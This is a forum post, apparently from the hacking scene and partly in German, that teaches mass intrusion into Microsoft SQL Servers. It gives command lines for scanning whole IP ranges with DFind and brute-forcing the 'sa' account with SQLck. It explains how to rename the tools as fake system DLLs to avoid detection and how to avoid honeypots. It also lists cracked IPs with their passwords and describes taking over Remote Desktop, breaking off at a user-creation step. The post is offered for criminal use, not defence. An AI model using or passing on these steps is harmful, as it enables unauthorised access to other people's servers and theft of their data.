Dieses Tutorial habe ich für h4ck-y0u geschrieben gehabt, möchte es euch aber nicht vorenthalten.

Hi,
some guys PM'ed me that thy wanna have a good basic tutorial in SQL Server Hacking without any "Injection" !


So here it is :

Cahpter 0: Basics
Chapter 1: Find vulnerable Server
Cahpter 2: Brute the vulnerable Server
Chapter 3: Check the Results
Chapter 4: Hack the Servers
Chapter 5: Break Security Rules


Uses Toolz: Modded DFind , Modded SQLck , Modded mexP , mssqlchecker.exe , Modded fPort , hidden32 , Modded KillZ , Servu-U UD , (RATmin) , Moddet SQLexec III , 1.013 , Simple SQL Browser , Bulletproof FTP Server , Pumpkin TFTP , FlashFXP , Auto-Hacker by Z3r00l / dermoeter

All this tools are in a link above this tutorial! PLS dont share them 2 much .... just h4ck-y0u base!




Chapter 0:

First some Basics to MSSQL Hacking. This type of Server is runnung on Port 1433. The basic User Account is "sa".
There are thounds of damn fucking n00b admins out there. They leave the "sa" password blank or "12345" "sa" etc.
The advantage of hacking MSSQL is that you can use all your well knows cmd commands. net stop , net start , net user , etc
Lets start:





Chapter 1:

Find vulnerable Server - Okay Guyz lets start. First we need some IP's with MSSQL running. MSSQL is runnung on port 1433.
Extract the Tool DFind.exe or if you have a remote Server with full rights use dfindold.exe cause its most time UD by AVS.
Then you have to choose a good IP-Range wich you wanna scan for MSSQL. But PLEASE ! Make a Whois to some IP's first. Dont scan honeypots or in your own country ! I use http://www.iks-jena.de/cgi-bin/whois.pl tho whois IP with country results.
If you are intrested in some special country use http://www.ipaddresslocation.org/ip_...get_ranges.php to show wich ranges are in the selected country. Now back 2 real work.

Example 1 - Scan on local Computer.

When you have extracted the DFind.exe to local PC cd to your directory.
cmd.exe > cd c:\scanner\dfind\ ( example )
Then run DFind.exe with these Parameters:

DFind.exe -p 1433 startrange endrange ( example : 207.261.0.0 207.280.255.254 )

Now there is a .txt file called dfind.txt . Init there are all the foundet IP with an open 1433 port.
Wait a day or just some hours, depending on the range size.

Example 2 - scan on a remote Stro/Server

A hacked SQL with FXPable server is called "Stro" and it comes from the fxp scene. This running FTP-Server allowed to extract various code wich is compatibel to win32 code. A remote Server with Remote Desktop or full rights can also be used but you hoster will kick you in a few hours ^^.
Just upload your hidden32.exe dfind.exe to your remote and change to the directory.
Depending on the remote server use this commans

FXP-Server :site exec hidden32.exe dfind.exe -p 1433 rangestart rangeend ( example : 207.261.0.0 207.280.255.254 ).
0815-Remote :dfind.exe -p 1433 rangestart rangeend ( example : 207.261.0.0 207.280.255.254 ).

You can find the dfind.txt in the same directory like ur .exe
Wait a day or just some hours, depending on the range size.


There are a few other command line sql scanner. sql 100 500 1000 , sqllhf blabla i hate them all!



Chapter 2:

Brute the results shown in dfind.txt

Example 1 - Brute on local Computer.

Extract the tools /moded Bruter/ and SQlck.exe. Copy the dfind.txt in the same directory! There are other options but this works 100%. SQLcl.exe is an password auditing tool also called as bruter. Cause were just bruting "sa" in my exmamples you need only a pw.txt file. In my pack there are 2 diffent. A "small" version and a 15mb version. First use the small edition there easy crackable server are not so hard protected like the other
Then run SQLck.exe with these Parameters:

SQlck.exe -p PW.txt -i dfind.txt -o result.txt -t 200

-p = Password File
-i = Scan Result File
-o = Output File.
-t = Threats

Depending on your connection incremenet the -t option.
Now let them crack. If the size of results.txt grows feel lucky, there are some cracked sql's.

It's possible that you have not enough RAM to use SQLck.exe
Then read Example 3 !....
I've over 100 Hacked Stros. The cracking power is unbelievably!
My Intel Xenon 3800 with 8GB Ram and a fiber-optic network needs to crack a 1MB dfind file with 1000 threads more than 3 days! So dont be afraid if there are not to much results in the first hours.



Example 2 - Brute on remote Stro/Server.

Same thinks like in chapter 1 Example 2.

Upload /modded Bruter/ SQLck.exe hidden32.exe and PW.txt to your server. Copy the dfind.txt to your sqlck.exe dir!
Depending on the remote server use this commans


FXP-Server : site exec hidden32.exe SQlck.exe -p PW.txt -i dfind.txt -o result.txt -t 200
0815-Remote : SQlck.exe -p PW.txt -i dfind.txt -o result.txt -t 200

If the Server hang up dont worry. Just a big start lag.


Example 3 - When SQLck.exe hangs up.

Okay then change to your /modded Bruter/ dir.
There are 3 different files. Legend:

Sqlck.exe -> rundll32.dll
password.txt -> mspoolservice.dll
SQLck_Logfile.txt -> Systemservice.ocx
result.txt -> winlogon.dll
hidden.exe -> system32.dll


Usage1: rundll32.dll -p mspoolservice-xxl.dll -i scan.txt -r sa -o winlogon.dll -t 200
Usage2: site exec system32.dll rundll32.dll -p mspoolservice-xxl.dll -i scan.txt -r sa -o winlogon.dll -t 99999

This tool is not modded by me! The respect goes to the real writer pls!





Chapter 3 - Check the Results



Yeah now lets check the bruted results!
Open your results.txt or winlogon.dll(open with notepad).

This could be a result:

202.76.235.51:1433 [sa:123456] Time:422 msec
202.80.173.17:1433 [sa:sa] Time:313 msec <----lowest time / fastest server
202.75.223.141:1433 [sa:!@#$%^&*()] Time:453 msec
202.82.116.202:1433 [sa:sa] Time:328 msec
202.83.41.166:1433 [sa:] Time:360 msec
202.82.39.244:1433 [sa:password] Time:313 msec
202.85.51.12:1433 [sa:password] Time:312 msec
202.85.169.95:1433 [sa:123] Time:344 msec
202.86.128.229:1433 [sa:] Time:672 msec
202.87.47.27:1433 [sa:] Time:3250 msec
202.88.128.108:1433 [sa:] Time:1593 msec
202.88.128.190:1433 [sa:] Time:640 msec


IP USERASS and the React Time. First check the IP's with the lowest React time!!!
Now open sqlexec2.exe. Just click "later"
Insert the IP in the Host field. Then insert username and password and klick on connect!

A worked connection is like this:
SQL>Connecting 202.97.181.61.
SQL>Connected to 202.97.181.61.

A bad connection is like this:
SQL>Connecting 202.97.181.61.
SQL>Could not connect to 202.97.181.61.
SQL>Disconnected.

This yould happend cause of wrong typed password or since the cracking the server password was changed =(

On a woking connection type in command linke : dir c:\

There are also differnt results.

The good one is the list of files and folders on your server.
All the other results are explained in chapter 5!



Chapter 4 - Hack the Servers

Now the intresting things. If you found a cracked results with listed files and folders FIRST run on your PC

Example 1 - Check Remote Desktop Connection

run > mstsc.exe
Type in the SAME IP from your SQL Server.
If you can connect and see the remote desktop....damn your in!
Create your own user:

p.s. JA Copyright liegt bei mir! dermoeter aka Z3r0c00l

wer sich gerne wirklich damit beschätigen möchte bekommt den rapidshare link für restliche proggs per PN.